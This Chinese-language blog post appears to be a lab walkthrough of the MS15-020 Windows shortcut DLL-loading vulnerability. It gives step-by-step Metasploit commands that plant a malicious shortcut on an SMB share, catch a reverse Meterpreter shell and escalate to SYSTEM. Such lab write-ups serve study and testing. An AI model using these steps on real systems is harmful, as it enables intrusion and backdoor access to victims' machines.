MS15-020漏洞測試


名稱:Microsoft DLL植入遠程代碼執行漏洞(CVE-2015-0096)(MS15-020)

了解:Microsoft Windows沒有正確處理DLL文件的加載,存在遠程代碼執行漏洞,通過誘使用戶打開遠程WebDAV或SMB共享上的某些文件利用此漏洞,

成功利用后可導致加載任意庫。Windows使用.lnk來定義文件或者目錄的快捷方式,可以使用.CPL文件來自定義圖標。問題是,在Windows中,圖標從模塊(或者可執行文件或動態鏈接庫)加載。

事實上,.cpl文件實際上是DLL文件。因為攻擊者可以定義哪些可執行模塊會被加載,攻擊者可以利用.LNK文件來執行任意代碼。

實驗環境:

共享主機win7:192.168.1.3 

入侵主機linux:192.168.1.7

受害者主機XP:192.168.10

 

打開終端輸入命令:

msfconsole    //啟動msf(metasploit framework)

search ms15  //搜索關鍵字相關漏洞

use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  //漏洞利用模塊

info //查看漏洞相關信息

set payload windows/meterpreter/reverse_tcp     //設置一個反彈shell

設置好參數,設置漏洞利用模塊列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.3  //我設置為我的另一台主機地址 就是你開着共享那台機器的地址

set UNCSHARE share       //設置共享文件的文件夾 這里主機192.168.1.3在C盤下的share里文件夾開啟了共享 提前創建好共享

set LHOST 192.168.1.7   //設置漏洞成功利用后后門連接的地址

exploit  //執行漏洞

exploit后會發現生成了幾個文件,

我們去生成的目錄下把文件拷貝到共享主機的共享文件夾下

 

復制到共享主機后,在啟動MSF進行配置剛才的后門進行監聽...輸入命令

1.  use exploit/multi/handler

2.  set payload windows/meterpreter/reverse_tcp

3. set LHOST 192.168.1.7

4. exploit

 

受害者訪問共享后,

成功了觸發了漏洞

可以發現入侵者這邊彈回來了一個回話session 1,簡單點說就是一個后門,這里我順便提了下權,可以看見system權限。

實驗結束,下班,關門,回家。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM